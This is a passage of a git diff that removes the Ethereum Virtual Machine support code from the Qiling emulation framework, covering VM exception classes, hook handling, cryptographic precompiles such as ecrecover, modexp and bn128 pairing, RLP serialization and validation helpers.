BlockNotFound(PyEVMError): - """ - Raised when the block with the given number/hash does not exist. - This will happen, for example, if the transactions or uncles are not - saved in the database. - """ - pass - - -class TransactionNotFound(PyEVMError): - """ - Raised when the transaction with the given hash or block index does not exist. - """ - pass - - -class ReceiptNotFound(PyEVMError): - """ - Raised when the Receipt with the given receipt index does not exist. - """ - pass - - -class ParentNotFound(HeaderNotFound): - """ - Raised when the parent of a given block does not exist. - """ - pass - - -class CanonicalHeadNotFound(PyEVMError): - """ - Raised when the chain has no canonical head. - """ - pass - - -class GapTrackingCorrupted(PyEVMError): - """ - Raised when the tracking of chain gaps appears to be corrupted (e.g. overlapping gaps) - """ - pass - - -class CheckpointsMustBeCanonical(PyEVMError): - """ - Raised when a persisted header attempts to de-canonicalize a checkpoint - """ - pass - - -class Halt(PyEVMError): - """ - Raised when an opcode function halts vm execution. - """ - pass - - -class VMError(PyEVMError): - """ - Base class for errors raised during VM execution. - """ - burns_gas = True - erases_return_data = True - - -class OutOfGas(VMError): - """ - Raised when a VM execution has run out of gas. - """ - pass - - -class InsufficientStack(VMError): - """ - Raised when the stack is empty. - """ - pass - - -class FullStack(VMError): - """ - Raised when the stack is full. - """ - pass - - -class InvalidJumpDestination(VMError): - """ - Raised when the jump destination for a JUMPDEST operation is invalid. - """ - pass - - -class InvalidInstruction(VMError): - """ - Raised when an opcode is invalid. - """ - pass - - -class InsufficientFunds(VMError): - """ - Raised when an account has insufficient funds to transfer the - requested value. - """ - pass - - -class StackDepthLimit(VMError): - """ - Raised when the call stack has exceeded it's maximum allowed depth. - """ - pass - - -class ContractCreationCollision(VMError): - """ - Raised when there was an address collision during contract creation. - """ - pass - - -class IncorrectContractCreationAddress(VMError): - """ - Raised when the address provided by transaction does not - match the calculated contract creation address. - """ - pass - - -class Revert(VMError): - """ - Raised when the REVERT opcode occured - """ - burns_gas = False - erases_return_data = False - - -class WriteProtection(VMError): - """ - Raised when an attempt to modify the state database is made while - operating inside of a STATICCALL context. - """ - pass - - -class OutOfBoundsRead(VMError): - """ - Raised when an attempt was made to read data beyond the - boundaries of the buffer (such as with RETURNDATACOPY) - """ - pass diff --git a/qiling/arch/evm/hooks.py b/qiling/arch/evm/hooks.py deleted file mode 100644 index c2354c713..000000000 --- a/qiling/arch/evm/hooks.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework - -import types -from enum import IntEnum -from typing import MutableMapping, MutableSequence - -from qiling.core_hooks_types import Hook, HookAddr, HookIntr, HookRet - -class EVM_HOOK(IntEnum): - CODE = (1 << 0) - ADDR = (1 << 1) - INSN = (1 << 2) - -class QlArchEVMHooks: - def __init__(self) -> None: - self.hook_code_list: MutableSequence[Hook] = [] - self.hook_insn_list: MutableSequence[HookIntr] = [] - self.hook_addr_dict: MutableMapping[int, MutableSequence[HookAddr]] = {} - -evm_hooks_info = QlArchEVMHooks() - -def __evm_hook_code(ql, callback, user_data=None, begin=1, end=0): - h = Hook(callback, user_data, begin, end) - evm_hooks_info.hook_code_list.append(h) - - return HookRet(ql, EVM_HOOK.CODE, h) - -def __evm_hook_insn(ql, callback, intno, user_data=None, begin=1, end=0): - h = HookIntr(callback, intno, user_data) - evm_hooks_info.hook_insn_list.append(h) - - return HookRet(ql, EVM_HOOK.INSN, h) - -def __evm_hook_address(ql, callback, address, user_data=None): - h = HookAddr(callback, address, user_data) - - if address not in evm_hooks_info.hook_addr_dict: - evm_hooks_info.hook_addr_dict[address] = [] - - evm_hooks_info.hook_addr_dict[address].append(h) - - return HookRet(ql, EVM_HOOK.ADDR, h) - -def __evm_hook_del(ql, hret): - h = hret.obj - hook_type = hret.type - - if hook_type == EVM_HOOK.CODE: - evm_hooks_info.hook_code_list.remove(h) - - elif hook_type == EVM_HOOK.INSN: - evm_hooks_info.hook_insn_list.remove(h) - - elif hook_type == EVM_HOOK.ADDR: - if h.addr in evm_hooks_info.hook_addr_dict: - hooks_list = evm_hooks_info.hook_addr_dict[h.addr] - - if h in hooks_list: - hooks_list.remove(h) - - if not hooks_list: - del evm_hooks_info.hook_addr_dict[h.addr] - -def monkeypatch_core_hooks(ql): - """Monkeypatch core hooks for evm - """ - - ql.hook_code = types.MethodType(__evm_hook_code, ql) - ql.hook_address = types.MethodType(__evm_hook_address, ql) - ql.hook_insn = types.MethodType(__evm_hook_insn, ql) - ql.hook_del = types.MethodType(__evm_hook_del, ql) diff --git a/qiling/arch/evm/precompiles/__init__.py b/qiling/arch/evm/precompiles/__init__.py deleted file mode 100644 index 451264e30..000000000 --- a/qiling/arch/evm/precompiles/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -from .sha256 import sha256 # noqa: F401 -from .identity import identity # noqa: F401 -from .ecrecover import ecrecover # noqa: F401 -from .ripemd160 import ripemd160 # noqa: F401 -from .modexp import modexp # noqa: F401 -from .ecadd import ecadd # noqa: F401 -from .ecmul import ecmul # noqa: F401 -from .ecpairing import ecpairing # noqa: F401 -from .blake2 import blake2b_fcompress # noqa: F401 diff --git a/qiling/arch/evm/precompiles/blake2.py b/qiling/arch/evm/precompiles/blake2.py deleted file mode 100644 index 6fe74b223..000000000 --- a/qiling/arch/evm/precompiles/blake2.py +++ /dev/null @@ -1,29 +0,0 @@ -import blake2b -from eth_utils import ( - ValidationError, -) - -from .._utils.blake2.coders import extract_blake2b_parameters -from ..exceptions import ( - VMError, -) -from ..vm.computation import ( - BaseComputation, -) - -GAS_COST_PER_ROUND = 1 - - -def blake2b_fcompress(computation: BaseComputation) -> BaseComputation: - try: - parameters = extract_blake2b_parameters(computation.msg.data_as_bytes) - except ValidationError as exc: - raise VMError(f"Blake2b input parameter validation failure: {exc}") from exc - - num_rounds = parameters[0] - gas_cost = GAS_COST_PER_ROUND * num_rounds - - computation.consume_gas(gas_cost, reason=f"Blake2b Compress Precompile w/ {num_rounds} rounds") - - computation.output = blake2b.compress(*parameters) - return computation diff --git a/qiling/arch/evm/precompiles/ecadd.py b/qiling/arch/evm/precompiles/ecadd.py deleted file mode 100644 index a8022039c..000000000 --- a/qiling/arch/evm/precompiles/ecadd.py +++ /dev/null @@ -1,70 +0,0 @@ -from typing import Tuple - -from py_ecc import ( - optimized_bn128 as bn128, -) - -from eth_utils import ( - ValidationError, - big_endian_to_int, - int_to_big_endian, -) -from eth_utils.toolz import ( - curry, -) - -from .. import constants - -from ..exceptions import ( - VMError, -) -from .._utils.bn128 import ( - validate_point, -) -from .._utils.padding import ( - pad32, - pad32r, -) - -from ..vm.computation import ( - BaseComputation, -) - - -@curry -def ecadd( - computation: BaseComputation, - gas_cost: int = constants.GAS_ECADD) -> BaseComputation: - - computation.consume_gas(gas_cost, reason='ECADD Precompile') - - try: - result = _ecadd(computation.msg.data_as_bytes) - except ValidationError: - raise VMError("Invalid ECADD parameters") - - result_x, result_y = result - result_bytes = b''.join(( - pad32(int_to_big_endian(result_x.n)), - pad32(int_to_big_endian(result_y.n)), - )) - computation.output = result_bytes - return computation - - -def _ecadd(data: bytes) -> Tuple[bn128.FQ, bn128.FQ]: - x1_bytes = pad32r(data[:32]) - y1_bytes = pad32r(data[32:64]) - x2_bytes = pad32r(data[64:96]) - y2_bytes = pad32r(data[96:128]) - - x1 = big_endian_to_int(x1_bytes) - y1 = big_endian_to_int(y1_bytes) - x2 = big_endian_to_int(x2_bytes) - y2 = big_endian_to_int(y2_bytes) - - p1 = validate_point(x1, y1) - p2 = validate_point(x2, y2) - - result = bn128.normalize(bn128.add(p1, p2)) - return result diff --git a/qiling/arch/evm/precompiles/ecmul.py b/qiling/arch/evm/precompiles/ecmul.py deleted file mode 100644 index 96b0ffdbf..000000000 --- a/qiling/arch/evm/precompiles/ecmul.py +++ /dev/null @@ -1,67 +0,0 @@ -from typing import Tuple - -from py_ecc import ( - optimized_bn128 as bn128, -) - -from eth_utils import ( - big_endian_to_int, - int_to_big_endian, - ValidationError, -) -from eth_utils.toolz import ( - curry, -) - -from .. import constants - -from ..exceptions import ( - VMError, -) -from .._utils.bn128 import ( - validate_point, -) -from .._utils.padding import ( - pad32, - pad32r, -) - -from ..vm.computation import ( - BaseComputation, -) - - -@curry -def ecmul( - computation: BaseComputation, - gas_cost: int = constants.GAS_ECMUL) -> BaseComputation: - - computation.consume_gas(gas_cost, reason='ECMUL Precompile') - - try: - result = _ecmull(computation.msg.data_as_bytes) - except ValidationError: - raise VMError("Invalid ECMUL parameters") - - result_x, result_y = result - result_bytes = b''.join(( - pad32(int_to_big_endian(result_x.n)), - pad32(int_to_big_endian(result_y.n)), - )) - computation.output = result_bytes - return computation - - -def _ecmull(data: bytes) -> Tuple[bn128.FQ, bn128.FQ]: - x_bytes = pad32r(data[:32]) - y_bytes = pad32r(data[32:64]) - m_bytes = pad32r(data[64:96]) - - x = big_endian_to_int(x_bytes) - y = big_endian_to_int(y_bytes) - m = big_endian_to_int(m_bytes) - - p = validate_point(x, y) - - result = bn128.normalize(bn128.multiply(p, m)) - return result diff --git a/qiling/arch/evm/precompiles/ecpairing.py b/qiling/arch/evm/precompiles/ecpairing.py deleted file mode 100644 index 69544b34a..000000000 --- a/qiling/arch/evm/precompiles/ecpairing.py +++ /dev/null @@ -1,124 +0,0 @@ -from typing import Tuple - -from eth_utils import ( - big_endian_to_int, - ValidationError, -) -from eth_utils.toolz import ( - curry, - pipe, -) -from py_ecc import ( - optimized_bn128 as bn128, -) - -from .. import constants - -from ..exceptions import ( - VMError, -) - -from ..typing import ( - BytesOrView, -) - -from .._utils.bn128 import ( - validate_point, - FQP_point_to_FQ2_point, -) -from .._utils.padding import ( - pad32, -) - -from ..vm.computation import ( - BaseComputation, -) - - -ZERO = bn128.Z2 -EXPONENT = bn128.FQ12.one() - - -@curry -def ecpairing( - computation: BaseComputation, - gas_cost_base: int = constants.GAS_ECPAIRING_BASE, - gas_cost_per_point: int = constants.GAS_ECPAIRING_PER_POINT) -> BaseComputation: - - if len(computation.msg.data) % 192: - # data length must be an exact multiple of 192 - raise VMError("Invalid ECPAIRING parameters") - - num_points = len(computation.msg.data) // 192 - gas_fee = gas_cost_base + num_points * gas_cost_per_point - - computation.consume_gas(gas_fee, reason='ECPAIRING Precompile') - - try: - result = _ecpairing(computation.msg.data) - except ValidationError: - raise VMError("Invalid ECPAIRING parameters") - - if result is True: - computation.output = pad32(b'\x01') - elif result is False: - computation.output = pad32(b'\x00') - else: - raise Exception("Invariant: unreachable code path") - return computation - - -def _ecpairing(data: BytesOrView) -> bool: - exponent = bn128.FQ12.one() - - processing_pipeline = ( - _process_point(data[start_idx:start_idx + 192]) - for start_idx - in range(0, len(data), 192) - ) - exponent = pipe(bn128.FQ12.one(), *processing_pipeline) - - result = bn128.final_exponentiate(exponent) == bn128.FQ12.one() - return result - - -@curry -def _process_point(data_buffer: bytes, exponent: int) -> bn128.FQP: - x1, y1, x2_i, x2_r, y2_i, y2_r = _extract_point(data_buffer) - p1 = validate_point(x1, y1) - - for v in (x2_i, x2_r, y2_i, y2_r): - if v >= bn128.field_modulus: - raise ValidationError("value greater than field modulus") - - fq2_x = bn128.FQ2([x2_r, x2_i]) - fq2_y = bn128.FQ2([y2_r, y2_i]) - - p2 = ZERO - if (fq2_x, fq2_y) != (bn128.FQ2.zero(), bn128.FQ2.zero()): - p2 = (fq2_x, fq2_y, bn128.FQ2.one()) - if not bn128.is_on_curve(p2, bn128.b2): - raise ValidationError("point is not on curve") - - if bn128.multiply(p2, bn128.curve_order)[-1] != bn128.FQ2.zero(): - raise ValidationError("TODO: what case is this?????") - - return exponent * bn128.pairing(FQP_point_to_FQ2_point(p2), p1, final_exponentiate=False) - - -def _extract_point(data_slice: bytes) -> Tuple[int, int, int, int, int, int]: - x1_bytes = data_slice[:32] - y1_bytes = data_slice[32:64] - x2_i_bytes = data_slice[64:96] - x2_r_bytes = data_slice[96:128] - y2_i_bytes = data_slice[128:160] - y2_r_bytes = data_slice[160:192] - - x1 = big_endian_to_int(x1_bytes) - y1 = big_endian_to_int(y1_bytes) - x2_i = big_endian_to_int(x2_i_bytes) - x2_r = big_endian_to_int(x2_r_bytes) - y2_i = big_endian_to_int(y2_i_bytes) - y2_r = big_endian_to_int(y2_r_bytes) - - return x1, y1, x2_i, x2_r, y2_i, y2_r diff --git a/qiling/arch/evm/precompiles/ecrecover.py b/qiling/arch/evm/precompiles/ecrecover.py deleted file mode 100644 index b875856b5..000000000 --- a/qiling/arch/evm/precompiles/ecrecover.py +++ /dev/null @@ -1,63 +0,0 @@ -from eth_keys import keys -from eth_keys.exceptions import ( - BadSignature, -) - -from eth_utils import ( - big_endian_to_int, - ValidationError, -) - -from .. import constants - -from .._utils.padding import ( - pad32, - pad32r, -) - -from ..validation import ( - validate_lt_secpk1n, - validate_gte, - validate_lte, -) -from ..vm.computation import ( - BaseComputation, -) - - -def ecrecover(computation: BaseComputation) -> BaseComputation: - computation.consume_gas(constants.GAS_ECRECOVER, reason="ECRecover Precompile") - data = computation.msg.data_as_bytes - raw_message_hash = data[:32] - message_hash = pad32r(raw_message_hash) - - v_bytes = pad32r(data[32:64]) - v = big_endian_to_int(v_bytes) - - r_bytes = pad32r(data[64:96]) - r = big_endian_to_int(r_bytes) - - s_bytes = pad32r(data[96:128]) - s = big_endian_to_int(s_bytes) - - try: - validate_lt_secpk1n(r, title="ECRecover: R") - validate_lt_secpk1n(s, title="ECRecover: S") - validate_lte(v, 28, title="ECRecover: V") - validate_gte(v, 27, title="ECRecover: V") - except ValidationError: - return computation - - canonical_v = v - 27 - - try: - signature = keys.Signature(vrs=(canonical_v, r, s)) - public_key = signature.recover_public_key_from_msg_hash(message_hash) - except BadSignature: - return computation - - address = public_key.to_canonical_address() - padded_address = pad32(address) - - computation.output = padded_address - return computation diff --git a/qiling/arch/evm/precompiles/identity.py b/qiling/arch/evm/precompiles/identity.py deleted file mode 100644 index c62243e3a..000000000 --- a/qiling/arch/evm/precompiles/identity.py +++ /dev/null @@ -1,18 +0,0 @@ -from .. import constants -from .._utils.numeric import ( - ceil32, -) - -from ..vm.computation import ( - BaseComputation, -) - - -def identity(computation: BaseComputation) -> BaseComputation: - word_count = ceil32(len(computation.msg.data)) // 32 - gas_fee = constants.GAS_IDENTITY + word_count * constants.GAS_IDENTITYWORD - - computation.consume_gas(gas_fee, reason="Identity Precompile") - - computation.output = computation.msg.data_as_bytes - return computation diff --git a/qiling/arch/evm/precompiles/modexp.py b/qiling/arch/evm/precompiles/modexp.py deleted file mode 100644 index 7563433f4..000000000 --- a/qiling/arch/evm/precompiles/modexp.py +++ /dev/null @@ -1,145 +0,0 @@ -from typing import ( - Tuple, -) - -from eth_utils import ( - big_endian_to_int, - int_to_big_endian, -) - -from .. import constants - -from .._utils.numeric import ( - get_highest_bit_index, -) -from .._utils.padding import ( - pad32r, - zpad_right, - zpad_left, -) - -from ..vm.computation import ( - BaseComputation, -) - - -def _compute_adjusted_exponent_length(exponent_length: int, - first_32_exponent_bytes: bytes) -> int: - exponent = big_endian_to_int(first_32_exponent_bytes) - - if exponent_length <= 32 and exponent == 0: - return 0 - elif exponent_length <= 32: - return get_highest_bit_index(exponent) - else: - first_32_bytes_as_int = big_endian_to_int(first_32_exponent_bytes) - return ( - 8 * (exponent_length - 32) - + get_highest_bit_index(first_32_bytes_as_int) - ) - - -def _compute_complexity(length: int) -> int: - if length <= 64: - return length ** 2 - elif length <= 1024: - return ( - length ** 2 // 4 + 96 * length - 3072 - ) - else: - return length ** 2 // 16 + 480 * length - 199680 - - -def _extract_lengths(data: bytes) -> Tuple[int, int, int]: - # extract argument lengths - base_length_bytes = pad32r(data[:32]) - base_length = big_endian_to_int(base_length_bytes) - - exponent_length_bytes = pad32r(data[32:64]) - exponent_length = big_endian_to_int(exponent_length_bytes) - - modulus_length_bytes = pad32r(data[64:96]) - modulus_length = big_endian_to_int(modulus_length_bytes) - - return base_length, exponent_length, modulus_length - - -def _compute_modexp_gas_fee(data: bytes) -> int: - base_length, exponent_length, modulus_length = _extract_lengths(data) - - first_32_exponent_bytes = zpad_right( - data[96 + base_length:96 + base_length + exponent_length], - to_size=min(exponent_length, 32), - )[:32] - adjusted_exponent_length = _compute_adjusted_exponent_length( - exponent_length, - first_32_exponent_bytes, - ) - complexity = _compute_complexity(max(modulus_length, base_length)) - - gas_fee = ( - complexity - * max(adjusted_exponent_length, 1) - // constants.GAS_MOD_EXP_QUADRATIC_DENOMINATOR - ) - return gas_fee - - -def _modexp(data: bytes) -> int: - base_length, exponent_length, modulus_length = _extract_lengths(data) - - if base_length == 0: - return 0 - elif modulus_length == 0: - return 0 - - # compute start:end indexes - base_end_idx = 96 + base_length - exponent_end_idx = base_end_idx + exponent_length - modulus_end_dx = exponent_end_idx + modulus_length - - # extract arguments - modulus_bytes = zpad_right( - data[exponent_end_idx:modulus_end_dx], - to_size=modulus_length, - ) - modulus = big_endian_to_int(modulus_bytes) - if modulus == 0: - return 0 - - base_bytes = zpad_right(data[96:base_end_idx], to_size=base_length) - base = big_endian_to_int(base_bytes) - - exponent_bytes = zpad_right( - data[base_end_idx:exponent_end_idx], - to_size=exponent_length, - ) - exponent = big_endian_to_int(exponent_bytes) - - result = pow(base, exponent, modulus) - - return result - - -def modexp(computation: BaseComputation) -> BaseComputation: - """ - https://github.com/ethereum/EIPs/pull/198 - """ - data = computation.msg.data_as_bytes - - gas_fee = _compute_modexp_gas_fee(data) - computation.consume_gas(gas_fee, reason='MODEXP Precompile') - - result = _modexp(data) - - _, _, modulus_length = _extract_lengths(data) - - # Modulo 0 is undefined, return zero - # https://math.stackexchange.com/questions/516251/why-is-n-mod-0-undefined - result_bytes = b'' if modulus_length == 0 else zpad_left( - int_to_big_endian(result), - to_size=modulus_length - ) - - computation.output = result_bytes - return computation diff --git a/qiling/arch/evm/precompiles/ripemd160.py b/qiling/arch/evm/precompiles/ripemd160.py deleted file mode 100644 index 957a17dcd..000000000 --- a/qiling/arch/evm/precompiles/ripemd160.py +++ /dev/null @@ -1,26 +0,0 @@ -import hashlib - -from .. import constants - -from .._utils.numeric import ( - ceil32, -) -from .._utils.padding import ( - pad32, -) -from ..vm.computation import ( - BaseComputation, -) - - -def ripemd160(computation: BaseComputation) -> BaseComputation: - word_count = ceil32(len(computation.msg.data)) // 32 - gas_fee = constants.GAS_RIPEMD160 + word_count * constants.GAS_RIPEMD160WORD - - computation.consume_gas(gas_fee, reason="RIPEMD160 Precompile") - - # TODO: this only works if openssl is installed. - hash = hashlib.new('ripemd160', computation.msg.data).digest() - padded_hash = pad32(hash) - computation.output = padded_hash - return computation diff --git a/qiling/arch/evm/precompiles/sha256.py b/qiling/arch/evm/precompiles/sha256.py deleted file mode 100644 index 17fba5b32..000000000 --- a/qiling/arch/evm/precompiles/sha256.py +++ /dev/null @@ -1,22 +0,0 @@ -import hashlib - -from .. import constants - -from .._utils.numeric import ( - ceil32, -) - -from ..vm.computation import ( - BaseComputation, -) - - -def sha256(computation: BaseComputation) -> BaseComputation: - word_count = ceil32(len(computation.msg.data)) // 32 - gas_fee = constants.GAS_SHA256 + word_count * constants.GAS_SHA256WORD - - computation.consume_gas(gas_fee, reason="SHA256 Precompile") - input_bytes = computation.msg.data - hash = hashlib.sha256(input_bytes).digest() - computation.output = hash - return computation diff --git a/qiling/arch/evm/rlp/__init__.py b/qiling/arch/evm/rlp/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/rlp/accounts.py b/qiling/arch/evm/rlp/accounts.py deleted file mode 100644 index 5c0e15cfe..000000000 --- a/qiling/arch/evm/rlp/accounts.py +++ /dev/null @@ -1,44 +0,0 @@ -import rlp -from rlp.sedes import ( - big_endian_int, -) - -from ..abc import AccountAPI -from ..constants import ( - EMPTY_SHA3, - BLANK_ROOT_HASH, -) - -from .sedes import ( - trie_root, - hash32, -) - -from typing import Any - - -class Account(rlp.Serializable, AccountAPI): - """ - RLP object for accounts. - """ - fields = [ - ('nonce', big_endian_int), - ('balance', big_endian_int), - ('storage_root', trie_root), - ('code_hash', hash32) - ] - - def __init__(self, - nonce: int = 0, - balance: int = 0, - storage_root: bytes = BLANK_ROOT_HASH, - code_hash: bytes = EMPTY_SHA3, - **kwargs: Any) -> None: - super().__init__(nonce, balance, storage_root, code_hash, **kwargs) - - def __repr__(self) -> str: - return ( - f"Account(nonce={self.nonce}, balance={self.balance}, " - f"storage_root=0x{self.storage_root.hex()}, " - f"code_hash=0x{self.code_hash.hex()})" - ) diff --git a/qiling/arch/evm/rlp/sedes.py b/qiling/arch/evm/rlp/sedes.py deleted file mode 100644 index 0a10d38b5..000000000 --- a/qiling/arch/evm/rlp/sedes.py +++ /dev/null @@ -1,16 +0,0 @@ -import rlp -from rlp.sedes import ( - BigEndianInt, - Binary, -) - - -address = Binary.fixed_length(20, allow_empty=True) -hash32 = Binary.fixed_length(32) -uint32 = BigEndianInt(32) -uint256 = BigEndianInt(256) -trie_root = Binary.fixed_length(32, allow_empty=True) -chain_gaps = rlp.sedes.List(( - rlp.sedes.CountableList(rlp.sedes.List((uint32, uint32))), - uint32, -)) diff --git a/qiling/arch/evm/typing.py b/qiling/arch/evm/typing.py deleted file mode 100644 index 5af57671b..000000000 --- a/qiling/arch/evm/typing.py +++ /dev/null @@ -1,114 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -from typing import ( - Any, - Callable, - Dict, - Generic, - Iterable, - List, - Optional, - NewType, - Sequence, - Tuple, - Type, - TypeVar, - TYPE_CHECKING, - Union, -) - -from eth_typing import ( - Address, - BlockNumber, - Hash32, - HexStr, -) -import sys -if sys.version_info[0] == 3 and sys.version_info[1] >= 8: - from typing import TypedDict -else: - from typing_extensions import TypedDict - -if TYPE_CHECKING: - from .abc import VirtualMachineAPI # noqa: F401 - - -JournalDBCheckpoint = NewType('JournalDBCheckpoint', int) - -AccountDetails = TypedDict('AccountDetails', - {'balance': int, - 'nonce': int, - 'code': bytes, - 'storage': Dict[int, int] - }) -AccountState = Dict[Address, AccountDetails] - -AccountDiff = Iterable[Tuple[Address, str, Union[int, bytes], Union[int, bytes]]] - -BlockRange = Tuple[BlockNumber, BlockNumber] - -ChainGaps = Tuple[ - # series of gaps before the chain head - Tuple[BlockRange, ...], - # the first missing block number at the tip of the chain - BlockNumber, -] - -GeneralState = Union[ - AccountState, - List[Tuple[Address, Dict[str, Union[int, bytes, Dict[int, int]]]]] -] - -GenesisDict = Dict[str, Union[int, BlockNumber, bytes, Hash32]] - -BytesOrView = Union[bytes, memoryview] - -Normalizer = Callable[[Dict[Any, Any]], Dict[str, Any]] - -RawAccountDetails = TypedDict('RawAccountDetails', - {'balance': HexStr, - 'nonce': HexStr, - 'code': HexStr, - 'storage': Dict[HexStr, HexStr] - }) - -TransactionDict = TypedDict('TransactionDict', - {'nonce': int, - 'gasLimit': int, - 'gasPrice': int, - 'to': Address, - 'value': int, - 'data': bytes, - 'secretKey': bytes, - }) - -TransactionNormalizer = Callable[[TransactionDict], TransactionDict] - -VMFork = Tuple[BlockNumber, Type['VirtualMachineAPI']] - -VMConfiguration = Sequence[VMFork] - -VRS = NewType("VRS", Tuple[int, int, int]) - -IntConvertible = Union[int, bytes, HexStr, str] - - -TFunc = TypeVar('TFunc') - - -class StaticMethod(Generic[TFunc]): - """ - A property class purely to convince mypy to let us assign a function to an - instance variable. See more at: https://github.com/python/mypy/issues/708#issuecomment-405812141 - """ - def __get__(self, oself: Any, owner: Any) -> TFunc: - return self._func - - def __set__(self, oself: Any, value: TFunc) -> None: - self._func = value - - -HeaderParams = Union[Optional[int], BlockNumber, bytes, Address, Hash32] diff --git a/qiling/arch/evm/validation.py b/qiling/arch/evm/validation.py deleted file mode 100644 index 1227a6b2f..000000000 --- a/qiling/arch/evm/validation.py +++ /dev/null @@ -1,254 +0,0 @@ -#!/usr/bin/env python3 -# -# Cross Platform and Multi Architecture Advanced Binary Emulation Framework -# - -import functools - -from typing import ( - Any, - Dict, - Iterable, - Sequence, - Union, -) - -from eth_typing import ( - Address, - Hash32, -) - -from eth_utils import ( - ValidationError, -) -from eth_utils.toolz import dicttoolz -from eth_utils.toolz import functoolz -from eth_utils.toolz import itertoolz - -from .constants import ( - GAS_LIMIT_ADJUSTMENT_FACTOR, - GAS_LIMIT_MAXIMUM, - GAS_LIMIT_MINIMUM, - SECPK1_N, - UINT_256_MAX, - UINT_64_MAX, -) - -from .typing import ( - BytesOrView, -) - - -def validate_is_bytes(value: bytes, title: str = "Value") -> None: - if not isinstance(value, bytes): - raise ValidationError( - f"{title} must be a byte string. Got: {type(value)}" - ) - - -def validate_is_bytes_or_view(value: BytesOrView, title: str = "Value") -> None: - if isinstance(value, (bytes, memoryview)): - return - raise ValidationError( - f"{title} must be bytes or memoryview. Got {type(value)}" - ) - - -def validate_is_integer(value: Union[int, bool], title: str = "Value") -> None: - if not isinstance(value, int) or isinstance(value, bool): - raise ValidationError( - f"{title} must be a an integer. Got: {type(value)}" - ) - - -def validate_length(value: Sequence[Any], length: int, title: str = "Value") -> None: - if not len(value) == length: - raise ValidationError( - f"{title} must be of length {length}. Got {value} of length {len(value)}" - ) - - -def validate_length_lte(value: Sequence[Any], maximum_length: int, title: str = "Value") -> None: - if len(value) > maximum_length: - raise ValidationError( - f"{title} must be of length less than or equal to {maximum_length}. " - f"Got {value} of length {len(value)}" - ) - - -def validate_gte(value: int, minimum: int, title: str = "Value") -> None: - if value < minimum: - raise ValidationError( - f"{title} {value} is not greater than or equal to {minimum}" - ) - validate_is_integer(value) - - -def validate_gt(value: int, minimum: int, title: str = "Value") -> None: - if value <= minimum: - raise ValidationError( - f"{title} {value} is not greater than {minimum}" - ) - validate_is_integer(value, title=title) - - -def validate_lte(value: int, maximum: int, title: str = "Value") -> None: - if value > maximum: - raise ValidationError( - f"{title} {value} is not less than or equal to {maximum}" - ) - validate_is_integer(value, title=title) - - -def validate_lt(value: int, maximum: int, title: str = "Value") -> None: - if value >= maximum: - raise ValidationError( - f"{title} {value} is not less than {maximum}" - ) - validate_is_integer(value, title=title) - - -def validate_canonical_address(value: Address, title: str = "Value") -> None: - if not isinstance(value, bytes) or not len(value) == 20: - raise ValidationError( - f"{title} {value!r} is not a valid canonical address" - ) - - -def validate_multiple_of(value: int, multiple_of: int, title: str = "Value") -> None: - if not value % multiple_of == 0: - raise ValidationError( - f"{title} {value} is not a multiple of {multiple_of}" - ) - - -def validate_is_boolean(value: bool, title: str = "Value") -> None: - if not isinstance(value, bool): - raise ValidationError( - f"{title} must be an boolean. Got type: {type(value)}" - ) - - -def validate_word(value: Hash32, title: str = "Value") -> None: - if not isinstance(value, bytes): - raise ValidationError( - f"{title} is not a valid word. Must be of bytes type: Got: {type(value)}" - ) - elif not len(value) == 32: - raise ValidationError( - f"{title} is not a valid word. Must be 32 bytes in length: Got: {len(value)}" - ) - - -def validate_uint64(value: int, title: str = "Value") -> None: - if not isinstance(value, int) or isinstance(value, bool): - raise ValidationError( - f"{title} must be an integer: Got: {type(value)}" - ) - if value < 0: - raise ValidationError( - f"{title} cannot be negative: Got: {value}" - ) - if value > UINT_64_MAX: - raise ValidationError( - f"{title} exeeds maximum UINT256 size. Got: {value}" - ) - - -def validate_uint256(value: int, title: str = "Value") -> None: - if not isinstance(value, int) or isinstance(value, bool): - raise ValidationError( - f"{title} must be an integer: Got: {type(value)}" - ) - if value < 0: - raise ValidationError( - f"{title} cannot be negative: Got: {value}" - ) - if value > UINT_256_MAX: - raise ValidationError( - f"{title} exeeds maximum UINT256 size. Got: {value}" - ) - - -def validate_stack_int(value: int) -> None: - if 0 <= value <= UINT_256_MAX: - return - raise ValidationError( - "Invalid Stack Item: Must be a 256 bit integer. Got {value!r}" - ) - - -def validate_stack_bytes(value: bytes) -> None: - if len(value) <= 32: - return - raise ValidationError( - "Invalid Stack Item: Must be either a length 32 byte string. Got {value!r}" - ) - - -validate_lt_secpk1n = functools.partial(validate_lte, maximum=SECPK1_N - 1) -validate_lt_secpk1n2 = functools.partial(validate_lte, maximum=SECPK1_N // 2 - 1) - - -def validate_unique(values: Iterable[Any], title: str = "Value") -> None: - if not itertoolz.isdistinct(values): - duplicates = functoolz.pipe( - values, - itertoolz.frequencies, # get the frequencies - - # filter to ones that occure > 1 - functoolz.partial(dicttoolz.valfilter, lambda v: v > 1), - sorted, # sort them - tuple, # cast them to an immutiable form - ) - raise ValidationError( - f"{title} does not contain unique items. Duplicates: " - f"{', '.join((str(value) for value in duplicates))}" - ) - - -def validate_block_number(block_number: int, title: str = "Block Number") -> None: - validate_is_integer(block_number, title) - validate_gte(block_number, 0, title) - - -def validate_vm_block_numbers(vm_block_numbers: Iterable[int]) -> None: - validate_unique(vm_block_numbers, title="Block Number set") - - for block_number in vm_block_numbers: - validate_block_number(block_number) - -def validate_gas_limit(gas_limit: int, parent_gas_limit: int) -> None: - if gas_limit < GAS_LIMIT_MINIMUM: - raise ValidationError(f"Gas limit {gas_limit} is below minimum {GAS_LIMIT_MINIMUM}") - if gas_limit > GAS_LIMIT_MAXIMUM: - raise ValidationError(f"Gas limit {gas_limit} is above maximum {GAS_LIMIT_MAXIMUM}") - diff = gas_limit - parent_gas_limit - if diff > (parent_gas_limit // GAS_LIMIT_ADJUSTMENT_FACTOR): - raise ValidationError( - f"Gas limit {gas_limit} difference to parent {parent_gas_limit} is too big {diff}" - ) - - -ALLOWED_HEADER_FIELDS = { - 'coinbase', - 'difficulty', - 'gas_limit', - 'timestamp', - 'extra_data', - 'mix_hash', - 'nonce', - 'uncles_hash', - 'transaction_root', - 'receipt_root', -} - - -def validate_header_params_for_configuration(header_params: Dict[str, Any]) -> None: - extra_fields = set(header_params.keys()).difference(ALLOWED_HEADER_FIELDS) - if extra_fields: - raise 